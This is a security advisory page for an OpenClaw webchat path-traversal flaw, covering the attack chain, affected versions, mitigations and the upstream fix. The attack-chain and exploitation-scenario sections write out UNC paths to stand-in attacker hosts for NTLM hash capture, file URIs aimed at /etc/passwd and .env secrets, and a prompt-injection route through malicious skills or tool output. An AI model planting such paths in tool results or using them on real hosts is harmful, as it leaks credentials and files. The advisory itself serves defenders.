GHSA-mr34-9552-qr95: OpenClaw path traversal leaks

CISO Take

OpenClaw's webchat component fails to enforce local-root containment on tool-result media paths, allowing a crafted media reference to trigger host-side file reads or Windows UNC/NTLM credential leakage before any output is rendered to the user. With 4 downstream dependents and 135 prior CVEs in the same package, OpenClaw has a documented pattern of security issues that warrants heightened scrutiny in any agentic deployment. No public exploit or CISA KEV listing exists yet, but Windows deployments face elevated risk: UNC path injection triggering NTLM credential capture is low-friction and high-impact, requiring zero user interaction once the crafted tool result reaches the media normalization code. Upgrade openclaw to 2026.4.15 immediately; if patching is blocked, enforce outbound SMB blocking (TCP 445) on Windows hosts and disable webchat media embedding at the application layer until the patch is applied.

Sources: GitHub Advisory ATLAS

What is the risk?

Medium risk overall, elevated to high for Windows deployments. Exploitation requires a crafted tool-result media path to reach the webchat media normalization pipeline — an indirect but realistic path in agentic workflows where tool outputs are forwarded to webchat rendering without sanitization. The pre-patch absence of assertLocalMediaAllowed enforcement means the containment bypass is reliable once the attack path is reached. On Windows, UNC-triggered NTLM credential capture requires no user interaction on the host and yields authentication material reusable across the network. Non-Windows deployments face bounded file disclosure limited to the process's filesystem permissions, which is less severe but still a meaningful data leakage risk in multi-tenant or sensitive environments.

How does the attack unfold?

Malicious Tool Result Injection

Adversary delivers a crafted media reference containing a local path or Windows UNC path as part of a tool's return value, via a compromised third-party skill, a malicious ClawHub-sourced skill, or a prompt injection that manipulates tool output.

AML.T0053

Containment Bypass

OpenClaw's webchat media normalization receives the tool result and forwards the unsanitized path to the host-side media embedding pipeline, bypassing the configured localRoots containment policy due to missing assertLocalMediaAllowed enforcement.

AML.T0049

Host-Side File or Network Access

The host performs a filesystem stat or read for local file:// URIs, or initiates an outbound SMB connection for UNC paths (e.g., \\attacker.com\share), triggering NTLM credential negotiation on Windows or sensitive file access on any OS.

AML.T0037

Credential or File Exfiltration

Host NTLM credential hashes are captured by the adversary's server via the SMB handshake, or sensitive local files are read and exfiltrated, all occurring host-side before the user sees any rendered webchat output.

AML.T0086

Malicious Tool Result Injection

Adversary delivers a crafted media reference containing a local path or Windows UNC path as part of a tool's return value, via a compromised third-party skill, a malicious ClawHub-sourced skill, or a prompt injection that manipulates tool output.

AML.T0053

Containment Bypass

OpenClaw's webchat media normalization receives the tool result and forwards the unsanitized path to the host-side media embedding pipeline, bypassing the configured localRoots containment policy due to missing assertLocalMediaAllowed enforcement.

AML.T0049

Host-Side File or Network Access

The host performs a filesystem stat or read for local file:// URIs, or initiates an outbound SMB connection for UNC paths (e.g., \\attacker.com\share), triggering NTLM credential negotiation on Windows or sensitive file access on any OS.

AML.T0037

Credential or File Exfiltration

Host NTLM credential hashes are captured by the adversary's server via the SMB handshake, or sensitive local files are read and exfiltrated, all occurring host-side before the user sees any rendered webchat output.

AML.T0086

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
OpenClaw	npm	>= 2026.4.7, < 2026.4.15	`2026.4.15`
4 dependents 36% patched ~3d to patch Full package profile →

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

What should I do?

5 steps

Upgrade openclaw to >=2026.4.15 immediately — this is the only complete fix, hardening both chat-webchat-media.ts and web-media.ts with safe file-URL parsing and assertLocalMediaAllowed enforcement.
If patching is delayed, disable webchat media embedding features entirely at the application layer.
On Windows, enforce outbound SMB blocking (TCP 445) at the host firewall and network perimeter to prevent UNC-triggered NTLM leakage to external servers.
Audit outbound network logs for unexpected SMB connections originating from the OpenClaw process, and review filesystem access logs for anomalous reads outside expected media directories.
Audit third-party skills installed from ClawHub or other registries for crafted media paths in tool return values, given the documented malicious skill ecosystem around OpenClaw (AIID #1368).

How is it classified?

Data Extraction Data Leakage Agent Plugin AML.T0037 - Data from Local System AML.T0049 - Exploit Public-Facing Application AML.T0053 - AI Agent Tool Invocation AML.T0086 - Exfiltration via AI Agent Tool Invocation

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001

A.6.2.6 - AI system security and resilience

NIST AI RMF

MEASURE 2.6 - AI risk measurement and monitoring

OWASP LLM Top 10

LLM02 - Insecure Output Handling LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is GHSA-mr34-9552-qr95?

OpenClaw's webchat component fails to enforce local-root containment on tool-result media paths, allowing a crafted media reference to trigger host-side file reads or Windows UNC/NTLM credential leakage before any output is rendered to the user. With 4 downstream dependents and 135 prior CVEs in the same package, OpenClaw has a documented pattern of security issues that warrants heightened scrutiny in any agentic deployment. No public exploit or CISA KEV listing exists yet, but Windows deployments face elevated risk: UNC path injection triggering NTLM credential capture is low-friction and high-impact, requiring zero user interaction once the crafted tool result reaches the media normalization code. Upgrade openclaw to 2026.4.15 immediately; if patching is blocked, enforce outbound SMB blocking (TCP 445) on Windows hosts and disable webchat media embedding at the application layer until the patch is applied.

Is GHSA-mr34-9552-qr95 actively exploited?

No confirmed active exploitation of GHSA-mr34-9552-qr95 has been reported, but organizations should still patch proactively.

How to fix GHSA-mr34-9552-qr95?

1. Upgrade openclaw to >=2026.4.15 immediately — this is the only complete fix, hardening both chat-webchat-media.ts and web-media.ts with safe file-URL parsing and assertLocalMediaAllowed enforcement. 2. If patching is delayed, disable webchat media embedding features entirely at the application layer. 3. On Windows, enforce outbound SMB blocking (TCP 445) at the host firewall and network perimeter to prevent UNC-triggered NTLM leakage to external servers. 4. Audit outbound network logs for unexpected SMB connections originating from the OpenClaw process, and review filesystem access logs for anomalous reads outside expected media directories. 5. Audit third-party skills installed from ClawHub or other registries for crafted media paths in tool return values, given the documented malicious skill ecosystem around OpenClaw (AIID #1368).

What systems are affected by GHSA-mr34-9552-qr95?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI chat and webchat interfaces, local AI deployment environments, Windows-hosted AI agent deployments.

What is the CVSS score for GHSA-mr34-9552-qr95?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworksAI chat and webchat interfaceslocal AI deployment environmentsWindows-hosted AI agent deployments

MITRE ATLAS Techniques

AML.T0037 Data from Local System

AML.T0049 Exploit Public-Facing Application

AML.T0053 AI Agent Tool Invocation

AML.T0086 Exfiltration via AI Agent Tool Invocation

Compliance Controls Affected

ISO 42001: A.6.2.6

NIST AI RMF: MEASURE 2.6

OWASP LLM Top 10: LLM02, LLM07

What are the technical details?

Original Advisory

## Summary Webchat tool-result media normalization could pass local and UNC-style file paths into the host-side media embedding path without applying the configured local-root containment policy. ## Impact A crafted tool-result media reference could cause the host to attempt local file reads or Windows UNC/network path access while preparing webchat media blocks. This could disclose allowed host files or trigger network credential exposure on affected Windows deployments. Severity remains medium because exploitation depends on a tool-result media path reaching the webchat embedding path, but the sink is a host-side file read before the user sees the rendered result. ## Affected versions - Affected: `>= 2026.4.7, < 2026.4.15` - Patched: `2026.4.15` ## Fix OpenClaw `2026.4.15` hardens the webchat media path and the shared media resolver. Remote-host `file://` URLs and Windows network paths are rejected before filesystem access, and audio embedding now enforces configured `localRoots` containment before `stat` or read operations. Verified in `v2026.4.15`: - `src/gateway/server-methods/chat-webchat-media.ts` uses safe file-URL parsing, rejects Windows network paths, and calls `assertLocalMediaAllowed` before probing local audio files. - `src/media/web-media.ts` rejects remote-host `file://` URLs, Windows network paths, and local-root bypasses on the shared media path. - `src/gateway/server-methods/chat-webchat-media.test.ts` covers both remote-host `file://` rejection and local-root denial before filesystem access. Fix commits included in `v2026.4.15` and absent from `v2026.4.14`: - `1470de5d3e0970856d86cd99336bb8ada3fe87da` via PR #67293 - `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde` via PR #67298 - `52ef42302ead9e183e6c8810e0a04ee4ef8ae9fc` via PR #67303 as defense-in-depth for trusted media passthrough anchoring Thanks to @Kherrisan for reporting this issue.

Exploitation Scenario

An adversary controlling a tool's output — via a compromised third-party skill, a prompt injection that manipulates tool return values, or a malicious tool published to ClawHub — embeds a Windows UNC path such as \\attacker-controlled-server\capture in the media field of a tool result. When the OpenClaw host processes this result through the webchat media normalization pipeline, it reaches the media embedding code in chat-webchat-media.ts without the patched assertLocalMediaAllowed guard. The host initiates an outbound SMB connection to resolve the UNC path, triggering an NTLM authentication challenge that exposes the machine's credential hash to the adversary running Responder or a similar capture tool. On non-Windows systems, the adversary substitutes a local file URI (e.g., file:///etc/passwd or file:///home/user/.env) to exfiltrate configuration secrets before the user sees any webchat output.

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary CWE-73 External Control of File Name or Path Primary

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

[Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
[Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.